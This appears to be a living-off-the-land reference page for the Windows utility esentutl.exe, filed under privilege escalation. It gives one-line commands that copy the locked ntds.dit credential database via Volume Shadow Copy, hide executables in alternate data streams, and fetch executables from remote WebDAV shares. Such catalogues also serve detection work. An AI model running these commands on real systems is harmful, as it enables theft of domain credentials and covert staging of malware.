03 : /Privilege-escalation Windows#

~/ cat Esentutl.exe.md

Binary for working with Microsoft Joint Engine Technology (JET) database

Paths:

C:\Windows\System32\esentutl.exe
C:\Windows\SysWOW64\esentutl.exe

Detection:

Copy

Copies the source VBS file to the destination VBS file.

esentutl.exe /y C:\folder\sourcefile.vbs /d C:\folder\destfile.vbs /o

Copies a (locked) file using Volume Shadow Copy

esentutl.exe /y /vss c:\windows\ntds\ntds.dit /d c:\folder\ntds.dit

Alternate data streams

Copies the source EXE to an Alternate Data Stream (ADS) of the destination file.

esentutl.exe /y C:\ADS\file.exe /d c:\ADS\file.txt:file.exe /o

Copies the source Alternate Data Stream (ADS) to the destination EXE.

esentutl.exe /y C:\ADS\file.txt:file.exe /d c:\ADS\file.exe /o

Copies the remote source EXE to the destination Alternate Data Stream (ADS) of the destination file.

esentutl.exe /y \\192.168.100.100\webdav\file.exe /d c:\ADS\file.txt:file.exe /o

Download

Copies the source EXE to the destination EXE file

esentutl.exe /y \\live.sysinternals.com\tools\adrestore.exe /d \\otherwebdavserver\webdav\adrestore.exe /o